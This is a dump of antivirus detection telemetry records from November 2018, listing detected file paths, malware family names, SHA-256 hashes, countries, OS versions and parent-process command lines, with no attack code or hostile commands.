  Row(detection=Row(filename='avscan-20181101-095559-8341252c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095559-8341252C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:56:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='be958e6543436dfb4fbf57f99545ca02cf178d9e656c0443da27ed7178f00d66', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-12.available\\Avira\\BE958E6543436DFB4FBF57F99545CA02CF178D9E656C0443DA27ED7178F00D66', filesize=384000, name='W32/Sivis.A.#M1.#R1'), hash='be958e6543436dfb4fbf57f99545ca02cf178d9e656c0443da27ed7178f00d66', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:45:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:56:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='printwiz.exe', filepath='\\\\Server-gold\\home\\SUPERMARKET\\NONFOOD\\NONFOOD [SIL&DJU]\\SILMI\\MISILSS EVENT\\Corel\\CORELDRAW GRAPHICS SUITE X7\\Programs\\PrintWiz.exe', filesize=304000, name='W32/Sality.AT.#M1.#R1'), hash='9e2bf003f1bb05af1fab4360d069f7c6e5d03387236898b5bcc2a4763bd099db', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-01T03:10:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-152855-a7d9f86b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b647c110\\AVSCAN-20181102-133332-24AE2147\\AVSCAN-20181102-152855-A7D9F86B', filesize=576000, name='TR/ATRAPS.vkmip.#M1.#R1'), hash='9f7957a6c81655d1a33cdcc4fa9aa0ff11953712d672577c777860a0be31eb0f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:28:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c55ef4d34a146adfe370b110ed262eee450cc82a633af4557463508d0e932065.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\27.10.2017-145.available\\Avira\\Others\\PE-detected-Avira\\Adware.CrossRider.fqgns\\c55ef4d34a146adfe370b110ed262eee450cc82a633af4557463508d0e932065.MRG', filesize=2096000, name='Adware/CrossRider.fqgns.#M1.#R1'), hash='c55ef4d34a146adfe370b110ed262eee450cc82a633af4557463508d0e932065', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\28.01.2018-133.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-01T15:54:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-165409-4cdb7226', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ebe48554\\AVSCAN-20181104-165143-387DDB14\\AVSCAN-20181104-165409-4CDB7226', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:54:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-07-39-33.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T19:50:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220206-b24d2333', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-220206-B24D2333', filesize=64000, name='BDS/Rogue.766035.#M1.#R1'), hash='a4d3abd76129e10fefa2c2650cfd46e28530b443f76755f23d3f2e7b5c996f07', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:02:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200222-93fef4f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4e4b404e\\AVSCAN-20181104-200159-8F4C5DAF\\AVSCAN-20181104-200222-93FEF4F8', filesize=640000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='0ba087998ad82402890b695675cac24a658ef77763b4f18b53501489cd0aae99', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:02:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-144205-212ebb8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6125d533\\AVSCAN-20181104-135312-59F9F13F\\AVSCAN-20181104-144205-212EBB8F', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='06d88b9d01cdb35b3588f9ef1e2488c5ca905f586deb2106ec6cdaa703843752', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:12:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='snakebyte.exe', filepath='K:\\الثعابين\\SnakeByte.exe', filesize=384000, name='W32/Jeefo.A.#M1.#R1'), hash='9f60c3549c3b115e2bf3b3009b319fe50c6c52161da6debfe0df4b76b1fd2e17', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:04:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='6d72a116be57c06d272d643fa65661a8173d7c515d29436351b7a9b331c722ed', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:M2lv44Lh9kuhRVWb.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T19:39:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-023556-7aaebe48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5825c4d5\\AVSCAN-20181104-023325-62E505C9\\AVSCAN-20181104-023556-7AAEBE48', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T00:36:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1042589\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Desktop\\aTube_Catcher_0256909400.exe', parentsize=2610680, timestamp='2018-11-04T00:18:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-145936-4dbfbcd0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-145936-4DBFBCD0', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:59:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-230151-3ea4bc54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-224749-D7F124B9\\AVSCAN-20181104-230151-3EA4BC54', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T16:01:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T20:13:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-232253-236db606', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24ba8b03\\AVSCAN-20181104-232239-205A1F71\\AVSCAN-20181104-232253-236DB606', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='9d68807cc4ef56758891c335832bdc903d14ba45201fb94f172317d71d8c776e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:22:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-17-10-39.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T01:50:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153517-c5f386e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6125d533\\AVSCAN-20181104-135312-59F9F13F\\AVSCAN-20181104-153517-C5F386E9', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='5bdbede0a0bbc7d09dd0d228d82b3148fe9c74128c678e5379280c842c2d9280', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:05:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132639-5d1235ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132639-5D1235FF', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:26:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='system volume information.pif', filepath='i:\\system volume information\\system volume information.pif', filesize=5952000, name='TR/BitCoinMiner.qtdxe.#M1.#R1'), hash='6f59c94a106529163adc6375303d689d70c6c0b312d0d536cd85811fcdf1dd14', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\cmd.exe', parentsize=302592, timestamp='2018-11-04T15:33:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001959-9ceda200', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-001959-9CEDA200', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:49:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='spinstall.exe', filepath='G:\\SPDMTK FILES\\Lenovo\\Lenovo_A606_S039_150604_ROW_(by_firmwarefile.com)\\Lenovo_A606_S039_150604_ROW\\Driver\\Auto Installer Driver v1.1236.00\\SmartPhoneDriver\\x86\\spinstall.exe', filesize=640000, name='W32/Sality.AG.#M1.#R1'), hash='26a1024a60ce7cd98daedd9eb498992487bb68d14863353108f6eded6ad73c7a', metadata=Row(cmdline='\\\\\\/onboot', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WWW.HOSTJSC.NET\\Internet Download Manager\\IDMan.exe', parentsize=990720, timestamp='2018-11-04T03:23:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151443-ec3fb6d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-151443-EC3FB6D3', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:14:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e3d31ed9-547f-badb-4cde-8837ecca84e4.exe', filepath='K:\\{8105c66b-0ad1-36ee-b614-0917263830e2}\\e3d31ed9-547f-badb-4cde-8837ecca84e4.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='88723e07f10da4f273d86dd702476abc8e39e8a8f7e2ca936827af81e112701c', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4673304, timestamp='2018-11-04T18:28:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c544197bbc023222ce81f009c5b069e9da34c8d76bafbc41fd8e21b1477b11ef', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\C544197BBC023222CE81F009C5B069E9DA34C8D76BAFBC41FD8E21B1477B11EF', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='c544197bbc023222ce81f009c5b069e9da34c8d76bafbc41fd8e21b1477b11ef', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T10:18:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153252-481c5a23', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_36ce3390\\AVSCAN-20181104-153221-44209183\\AVSCAN-20181104-153252-481C5A23', filesize=1280000, name='TR/Agent.tyhsb.#M1.#R1'), hash='cc53c0083b2158bb6abafdab0da31474d97548d4a40f33de09f8bac83f8d98e5', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:32:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214727-142900a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-214727-142900A9', filesize=64000, name='BDS/Rogue.766002.#M1.#R1'), hash='c52dabe8d138d077358065c61a91b37e1ec4311e69e5b26e8f950f5d25c0c474', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:47:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T14:00:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='8a09a30645885737b1b40007c9da1460bfcebb22fa369cf17f9de8f8efe37345', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T15:55:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:40:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090704-0a8cc861', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_db8dd2eb\\AVSCAN-20181104-090024-C0286FC2\\AVSCAN-20181104-090704-0A8CC861', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:07:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-213006-01db52d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d26e01a\\AVSCAN-20181104-212932-FD9A8DCD\\AVSCAN-20181104-213006-01DB52D3', filesize=320000, name='PUA/DownloadSponsor.Gen.#M1.#R1'), hash='c3cd658e9d163ab548f9d2e37cd03d997069d146755a45283b48b9b3e07bd6e9', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:30:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-050005-50081ae5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1da9bed9\\AVSCAN-20181105-045949-4D53D3D1\\AVSCAN-20181105-050005-50081AE5', filesize=9344000, name='TR/Black.Gen2.#M1.#R1'), hash='9cd534d450db8b6b053240cd6d16cb3e3daefd32527d50b8f6ec0866934397c6', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:00:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T14:11:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-123105-07bf1aef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_06ad7eba\\AVSCAN-20181104-123036-0327A1E2\\AVSCAN-20181104-123105-07BF1AEF', filesize=64000, name='TR/KillAll.mrsrx.#M1.#R1'), hash='a587c2553b8bdbf97d8fd31ad8daae3659a71d142352b74bb5aacdb0a52b01f5', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T05:31:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d758', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d758', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:43:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151403-c6834f0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a3ac0d7c\\AVSCAN-20181104-140302-AD230418\\AVSCAN-20181104-151403-C6834F0D', filesize=704000, name='ADWARE/MultiPlug.Gen4.#M1.#R1'), hash='95f20bb451fb3e431e1b63b9370830240b40191eb6a721fe6b789ee328a79aad', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T08:13:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='drvsetupx64.exe', filepath='f:\\lenovo s10-3 win7\\s10-3 win7\\digital_camera\\chicony\\uvc_driver\\DrvSetupX64.exe', filesize=512000, name='W64/Infector.Gen8.#M300.#R700956'), hash='0157d7c00239c0d5484cc2caa7ba46fbcbc21becfb9dba7055775550e9205e3a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T03:29:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:10:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:58:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='C:\\Program Files (x86)\\Common Files\\microsoft shared\\DW\\DWTRIG20.EXE', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='9cba9ef1e8dd4bb883f628fc9a51cbdbedc4ce2eb00ca42212ccce321e7d7f9e', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Windows\\\\\\\\SERVIC~2\\\\\\\\LOCALS~1\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\3582-490\\\\\\\\ORIGIN~1.EXE\\\\\\" ', country='HU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\svchost.com', parentsize=41472, timestamp='2018-11-04T12:34:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_1a5dbb5e.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_1a5dbb5e.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:05:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055712-50b52540', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055712-50B52540', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:57:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T06:05:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-234035-fb7ca29c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ad3ee29\\AVSCAN-20181104-232029-684A501B\\AVSCAN-20181104-234035-FB7CA29C', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:40:36Z'), dt=datetime.date(2018, 11, 4)),
